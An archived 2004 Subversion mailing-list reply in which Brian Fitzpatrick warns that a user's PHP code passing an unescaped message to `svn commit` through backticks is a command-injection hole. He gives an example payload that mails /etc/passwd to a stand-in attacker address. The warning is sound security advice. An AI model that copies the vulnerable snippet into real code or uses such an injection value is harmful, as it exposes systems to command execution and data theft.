Re: PHP hack under way

From: Brian W. Fitzpatrick <fitz_at_red-bean.com>
Date: 2004-02-11 22:55:37 CET

On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> Ok, so I went ahead and took the easiest approach I could: svn client
> commands in php.
> The kinks have not all been worked out for my php portal but I did find
> a way to successfully
> push revisions to subversion through php.
>
> I use the backtick operator. Yep, it's that simple.
>
> $response = `svn commit -m \"$message\"`;
>
> I have found that the $response is dead-on accurate in this case despite
> warnings that the
> command line response may be garbled into binary.
>
> Here's a question: will svn add && svn commit work?

I don't know offhand, but I suspect that you may be opening up a
security hole the size of Texas by doing this. What if message is
actually equal to

"foo\" ; mail evilhaxor@example.com < /etc/passwd"

or something worse.

Just a little something to think about.

-Fitz

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Wed Feb 11 22:56:36 2004

This message: [ Message body ]
Next message: Bryan Simmons: "RE: PHP hack under way"
Previous message: Ben Collins-Sussman: "Re: PHP hack under way"
In reply to: Simmons, Bryan: "PHP hack under way"
Next in thread: Florian Weimer: "Re: PHP hack under way"
Reply: Florian Weimer: "Re: PHP hack under way"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]